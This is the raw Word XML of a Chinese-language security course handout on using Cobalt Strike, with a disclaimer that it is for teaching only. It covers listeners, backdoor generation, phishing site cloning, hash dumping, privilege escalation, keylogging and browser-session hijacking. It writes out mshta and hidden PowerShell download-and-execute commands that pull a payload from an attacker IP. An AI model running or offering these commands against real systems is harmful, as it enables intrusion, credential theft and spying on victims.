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免责声明： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="42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本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="42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希望同学们知法、懂法、守法，做一个良好公民。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0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jc w:val="center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CobaltStrike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CobaltStrike是一款渗透测试神器，被业界人称为CS神器。CobaltStrike分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>操作。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CobaltStrike集成了端口转发、服务扫描，windows 木马生成，java 木马生成，office 宏病毒生成，钓鱼攻击等强大的功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x00 CobaltStrike启动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启动服务端 （需要root或Administrator权限）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./teamserver 218.0.145.97 123456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218.0.145.97 是kali的ip地址，123456是密码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6053455" cy="2530475"/>
            <wp:effectExtent l="0" t="0" r="12065" b="14605"/>
            <wp:docPr id="1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3455" cy="2530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启动客户端 （运行CobaltStrike.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/cobaltstrike.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）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主机填kali的ip，用户任意取一个名字，密码填服务器设置的密码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562600" cy="4007485"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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007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连接成功后的界面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523230" cy="3881755"/>
            <wp:effectExtent l="0" t="0" r="8890" b="444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3881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功能说明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4714875" cy="5991225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1333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99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0x01 创建监听器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896610" cy="4128770"/>
            <wp:effectExtent l="0" t="0" r="1270" b="127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128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HTTP Hosts：Beacon回连主机地址，代理服务器主机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HTTP Hosts(Stager)：配置分阶段payload，Stager的马请求下载payload的地址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HTTP Port(上线/C2)：代理服务器监听的端口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HTTP Port(监听/Bind)：C2服务器监听的端口，实现端口重定向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Host Rotation Strategy：在Beacon通信时，可以选择更多的轮询方案以逃避检测、阻断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Payload分类：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1.内部beacon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Beacon DNS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Beacon HTTP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Beacon HTTPS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Beacon SMB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Beacon TCP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2.外部beacon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与其他工具联合使用时才会使用到，一般用来派生会话到MSF。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Foreign HTTP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Foreign HTTPS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3.External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用户可以自己编写的程序处理 C2 通信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External C2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0x02 生成后门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4781550" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1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HTA文档：生成一个恶意HTML Application木马，后缀格式为.hta。通过HTML调用其他语言的应用组件进行攻击，提供了可执行文件、PowerShell、VBA三种方法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Office宏 ：生成Office宏病毒文件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Payload生成器：生成各种语言版本的payload，可以生成基于C、Java、PowerShell、Python等语言的payload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Windows 可执行程序： 生成32位或64位的exe和基于服务的exe、DLL等后门程序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Windows 可执行程序 (S) ： 用于生成一个exe可执行文件，其中包含Beacon的完整payload，不需要阶段性的请求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1.HTA文档上线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生成基于PowerShell的木马</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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391150" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="14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</w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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选择文件托管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3562350" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="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467350" cy="4410075"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="13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410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</w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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3562350" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="6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受害机执行mshta命令，即可上线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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mshta http://218.0.145.97:80/download/file.ext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913120" cy="4137660"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7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137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2.Windows 可执行程序上线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生成32位的exe木马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4965065" cy="3427730"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="8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5065" cy="3427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受害机拉取木马文件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python3 -m http.server   #在木马处启动http服务</w:t>
      </w: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163445"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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4262755"/>
            <wp:effectExtent l="0" t="0" r="14605" b="4445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受害机双击执行或命令行执行文件，即可上线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6172835" cy="2666365"/>
            <wp:effectExtent l="0" t="0" r="14605" b="635"/>
            <wp:docPr id="9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 descr="IMG_26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2666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0x03 Web钓鱼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3495675" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
            <wp:docPr id="10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" descr="IMG_26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站点管理 ：对开启的web服务进行管理；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克隆网站 ：克隆某个网站，并可以记录受害者提交的数据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文件托管：提供一个本地文件下载的web地址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Web投递：基于Web的攻击测试脚本，自动生成可执行的payload，并生成一个下载运行的命令语句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签名Applet攻击 ：启动一个Web服务以提供自签名Java Applet的运行环境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智能Applet攻击 ：自动检测Java版本并利用已知的EXP绕过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信息搜集 ：获取一些系统信息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Web投递上线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362575" cy="4962525"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="11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 descr="IMG_27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96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3562350" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="29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 descr="IMG_27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受害机执行该命令，即可上线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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powershell.exe -nop -w hidden -c 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IEX ((new-object net.webclient).downloadstring(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://218.0.145.97:80/a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))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”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6101080" cy="2648585"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3175"/>
            <wp:docPr id="31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7" descr="IMG_27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2648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0x04 会话交互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429250" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="18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7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对于已经上线的主机，可以对它进行很多操作，在会话交互里面可以执行各种命令。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CS默认有60s心跳时间，这里可以通过sleep命令去修改心跳时间。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888990" cy="3586480"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10160"/>
            <wp:docPr id="16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9" descr="IMG_27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3586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 ？或 help 可以查看CS支持的各种命令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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5868035" cy="2513965"/>
            <wp:effectExtent l="0" t="0" r="14605" b="635"/>
            <wp:docPr id="25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 descr="IMG_27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35" cy="2513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0x05 凭证提权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4000500" cy="3190875"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="32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1" descr="IMG_27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190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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.抓取HASH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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6017260" cy="1779270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="21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 descr="IMG_27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1779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尝试爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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32ed87bdb5fdc5e9cba88547376818d4</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9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002405" cy="2110105"/>
            <wp:effectExtent l="0" t="0" r="5715" b="825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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.权限提升</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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利用了各种方式来提权，默认有两个提权payload可以使用，也可以下载其他payload提权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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5353050" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="11430" b="11430"/>
            <wp:docPr id="33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 descr="IMG_27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使用ms14-058，成功提到system权限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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5948680" cy="4020185"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3175"/>
            <wp:docPr id="26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 descr="IMG_27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4020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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.抓取明文密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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成功得到Administrator的密码是123456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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5993130" cy="3437255"/>
            <wp:effectExtent l="0" t="0" r="11430" b="6985"/>
            <wp:docPr id="30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 descr="IMG_28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3437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0x06 浏览探测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4333875" cy="3486150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="24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6" descr="IMG_28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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.浏览器代理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CS会注入到IE浏览器的进程中，在本地浏览器中设置该代理，就可以访问目标机器浏览器已经登录的网站。</w:t>
      </w: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场景：屏幕截图发现目标在使用ie浏览器浏览某个已登陆站点</w:t>
      </w:r>
    </w:p>
    <w:p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4150" cy="2713990"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1397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选择浏览器代理，等一会儿，选择x86ie浏览器，后面有勾代表可行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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166360" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 37" descr="49e07efbb29ae205c520605742ea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49e07efbb29ae205c520605742ea28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657600" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="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攻击者浏览器配置代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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0500" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="39" name="图片 39" descr="c5b89c879c71c34665de649d61344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5b89c879c71c34665de649d61344cd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直接输入网址进行访问无需身份认证</w:t>
      </w:r>
    </w:p>
    <w:p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9230" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="41" name="图片 41" descr="83e5d33be94cfa78806a67a843cf3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83e5d33be94cfa78806a67a843cf3f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如果是https网站，访问出现问题采取如下方法，忽略证书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chromium --no-sandbox --ignore-certificate-errors --proxy-server=192.168.27.133:20234</w:t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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.VNC桌面交互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可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实时观看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目标机器的桌面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内容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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5737860" cy="4001135"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="27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IMG_28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4001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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.文件浏览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对目标机器的所有文件进行操作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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6168390" cy="2677795"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="23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8" descr="IMG_28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2677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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.网络探测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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查看目标所在域内的其他目标</w:t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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.端口扫描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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
            <wp:docPr id="17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9" descr="IMG_28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5733415" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1905"/>
            <wp:docPr id="19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0" descr="IMG_28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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.进程列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/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列出目标机器的所有进程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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5991225" cy="2592705"/>
            <wp:effectExtent l="0" t="0" r="13335" b="13335"/>
            <wp:docPr id="20" name="图片 31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1" descr="IMG_28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592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“注入”功能是将beacon会话注入到另一个程序当中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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6002020" cy="3632835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="34" name="图片 32" descr="IMG_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 descr="IMG_28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3632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1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>键盘记录</w:t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“键盘记录”可以监听目标机器的键盘记录</w:t>
      </w:r>
    </w:p>
    <w:p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在受害机的beacon命令行输入: keylogger    #开始监听键盘记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2636520" cy="441960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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受害者在记事本或者网站登陆框中用键盘进行输入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2842260" cy="1165860"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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3566795" cy="2138045"/>
            <wp:effectExtent l="0" t="0" r="14605" b="10795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在视图模块，键盘记录处进行查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2447290"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350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rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.屏幕截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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在受害机的beacon命令行输入: screenshot    #开始截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4198620" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620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outlineLvl w:val="9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在视图模块，屏幕截图处进行查看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/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5270500" cy="2746375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="12065"/>
            <wp:docPr id="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wMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="007700A9"/>
    <w:rsid w:val="01407C14"/>
    <w:rsid w:val="02F157A0"/>
    <w:rsid w:val="03140FDC"/>
    <w:rsid w:val="04071455"/>
    <w:rsid w:val="041F585D"/>
    <w:rsid w:val="06A13CA1"/>
    <w:rsid w:val="07425AFB"/>
    <w:rsid w:val="08504FD0"/>
    <w:rsid w:val="09F236C3"/>
    <w:rsid w:val="0A8B65D3"/>
    <w:rsid w:val="0AAB40F7"/>
    <w:rsid w:val="0ABD2ABB"/>
    <w:rsid w:val="0E453A40"/>
    <w:rsid w:val="162E7404"/>
    <w:rsid w:val="222C5B8B"/>
    <w:rsid w:val="230E580F"/>
    <w:rsid w:val="24B1451C"/>
    <w:rsid w:val="26855921"/>
    <w:rsid w:val="282E09C2"/>
    <w:rsid w:val="29814155"/>
    <w:rsid w:val="2DE25FC3"/>
    <w:rsid w:val="31A66057"/>
    <w:rsid w:val="342441A9"/>
    <w:rsid w:val="34D53AE7"/>
    <w:rsid w:val="36E04FCA"/>
    <w:rsid w:val="3CE33E35"/>
    <w:rsid w:val="3E986769"/>
    <w:rsid w:val="40BB6940"/>
    <w:rsid w:val="473E5925"/>
    <w:rsid w:val="49014A37"/>
    <w:rsid w:val="4C224244"/>
    <w:rsid w:val="4CD5739C"/>
    <w:rsid w:val="4F8D21ED"/>
    <w:rsid w:val="51682A3B"/>
    <w:rsid w:val="517A6D4B"/>
    <w:rsid w:val="53AA6137"/>
    <w:rsid w:val="55291842"/>
    <w:rsid w:val="56F6082A"/>
    <w:rsid w:val="6CAB50B9"/>
    <w:rsid w:val="6D7E6628"/>
    <w:rsid w:val="710A4F14"/>
    <w:rsid w:val="730B3F77"/>
    <w:rsid w:val="74C62370"/>
    <w:rsid w:val="75FF7F28"/>
    <w:rsid w:val="76AA5600"/>
    <w:rsid w:val="79151D8F"/>
    <w:rsid w:val="7CB3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1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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml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2023-09-15T07:08:00Z</dcterms:created>
  <dc:creator>X</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-28T04:05:46Z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4F54879DB9DC445E8854F47E600DE949_12</vt:lpwstr>
  </property>
</Properties>
</file>